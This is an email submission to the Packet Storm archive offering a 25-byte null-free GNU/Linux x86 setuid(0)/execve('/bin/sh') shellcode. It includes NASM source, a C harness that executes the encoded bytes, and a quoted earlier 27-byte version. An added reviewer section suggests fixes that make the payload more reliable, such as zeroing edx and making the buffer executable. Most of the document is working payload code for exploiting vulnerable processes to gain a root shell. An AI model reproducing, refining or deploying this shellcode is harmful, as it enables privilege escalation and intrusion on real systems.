Hi, I've shrunk the shellcode down to 25 bytes: the smallest setuid & execve GNU/Linux shellcode without nulls that spawns a shell.

--------------------------------------------------------------------------------------

SMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT NULLS THAT SPAWNS A SHELL

History:
 + v1.0 (27 bytes) => http://opensec.es/2008/11/14/gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null/
 + v2.0 (26 bytes) => (http://vlan7.blogspot.com/) http://packetstormsecurity.org/filedesc/smallest_setuid_execve_sc.c.html

v3.0 (25 bytes)
################

Reviewer notes on the listings:
 + Neither listing (v3.0 below, nor the v1.0 quoted further down) writes ebx before the setuid `int 80h`, and neither writes edx before the execve `int 80h`. Part of the byte savings comes from letting the kernel see setuid(ebx) and execve(ebx, ecx=0, edx=<unset>), so the advertised setuid(0) / execve("/bin/sh",0,0) behaviour only holds when ebx and edx are already zero at entry. That is typically true at `_start` of a freshly exec'd static binary, but nothing guarantees it at the point shellcode runs inside an exploited process, and the C harness below is a plain indirect call with no register setup: a non-zero ebx becomes the uid handed to setuid, and a non-zero edx is passed as envp, which will usually make execve fail (EFAULT) or hand the shell a garbage environment. Zeroing edx after the `lea eax,[ecx+0Bh]` costs one null-free byte (`cdq`, since eax is then a small positive value) or two (`xor edx,edx`).
 + The `;pointer to "struct pt_regs"` comment on `mov ebx,esp` is misleading: after the three pushes, esp points at the NUL-terminated "//bin/sh" string just built on the stack, which is execve's first argument.
 + `lea eax,[ecx+0Bh]` rewrites all 32 bits of eax, so a negative (EPERM) return from setuid, e.g. when the harness is run unprivileged, cannot corrupt the execve syscall number; v1.0's `mov al,0xb` only sets the low byte, which is presumably why that version brackets its setuid call in pusha/popa.
 + In the C harness `shellcode` is a `const char[]`, which current toolchains place in read-only, non-executable memory; on a kernel enforcing NX the indirect call faults (SIGSEGV) before the first shellcode byte runs unless the data is made executable (an executable section, linking with `-z execstack`, or copying the bytes into an `mmap`ed RWX buffer). `%d` is also the wrong conversion for `sizeof(shellcode)-1`, which is a `size_t`; `%zu` avoids the format mismatch.

[NASM_SOURCE_CODE]
global _start

section .text

_start:

;setuid
xor ecx,ecx
lea eax,[ecx+17h];setuid syscall
int 80h

;execve
push ecx;ecx = 0
push 0x68732f6e ;sh/
push 0x69622f2f ;nib//
mov ebx,esp;pointer to "struct pt_regs"
lea eax,[ecx+0Bh];execve syscall
int 80h
[/NASM_SOURCE_CODE]

[C_SOURCE_CODE]
#include <stdio.h>

const char shellcode[]=
"\x31\xc9\x8d\x41\x17\xcd\x80\x51\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80";

int main()
{
printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT NULLS THAT SPAWNS A SHELL"
"\n\nCoded by Chema Garcia (aka sch3m4)"
"\n\t + sch3m4@opensec.es"
"\n\t + http://opensec.es"
"\n\n[+] Date: 22/11/2008"
"\n\n[+] Thanks to: vlan7"
"\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);

(*(void (*)()) shellcode)();

return 0;
}
[/C_SOURCE_CODE]

--------------------------------------------------------------------------------------

Could you add it?

Greetings,
Chema García

packet@packetstormsecurity.org escribió:
> Thanks; added!
>
>
> http://packetstormsecurity.org/shellcode/smallnonulls-exec.txt fbe997136460672e07de13d11aba57fc 27 bytes small GNU/Linux x86 setuid(0) && execve("/bin/sh",0,0) shellcode without NULLs.  Homepage: http://opensec.es/.
Authored By Chema Garcia
>
> On Thu, Nov 13, 2008 at 09:46:57PM +0100, sch3m4 wrote:
>
>> Hello, I've developed the smallest linux x86 setuid(0) &
>> execve("/bin/sh",0,0) shellcode without nulls with a size of 27 bytes.
>>
>> -----------[ C Source Code ]-----------
>> /*
>> Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode
>> without NULLs
>>
>> Coded by Chema Garcia (aka sch3m4)
>> + sch3m4@opensec.es
>> + http://opensec.es
>> Shellcode Size: 27 bytes
>> Date: 13/11/2008
>> */
>>
>>
>> #include <stdio.h>
>>
>> const char shellcode[]= "\x31\xC0" //xor eax,eax
>> "\x31\xC9" //xor ecx,ecx
>> "\xB0\x17" //mov al,17h
>> "\x60" //pusha
>> "\xCD\x80" //int 80h
>> "\x61" //popa
>> "\x51" //push ecx
>> "\x68\x6E\x2F\x73\x68" //push 0x68732f6e
>> "\x68\x2F\x2F\x62\x69" //push 0x69622f2f
>> "\x89\xE3" //mov ebx, esp
>> "\xB0\x0B" //mov al,0xb
>> "\xCD\x80"; //int 0x80
>>
>> int main()
>> {
>> printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode without NULLs"
>> "\n\nCoded by Chema Garcia (aka sch3m4)"
>> "\n\t + sch3m4@opensec.es"
>> "\n\t + http://opensec.es"
>> "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);
>> //(*(void (*)()) shellcode)();
>>
>> return 0;
>> }
>>
>> -----------[/ C Source Code ]-----------
>>
>> -----------[ ASM Source Code ]-----------
>> global _start
>>
>> section .text
>>
>> _start:
>>
>> xor eax,eax
>> xor ecx,ecx
>> mov al,17h
>> pusha
>> int 80h ;setuid
>> popa
>> push ecx
>> push 0x68732f6e
>> push 0x69622f2f
>> mov ebx, esp
>> mov al,0xb
>> int 0x80;execve
>>
>> -----------[/ ASM Source Code ]-----------
>>
>> Greetings,
>> Chema García
>>
>
>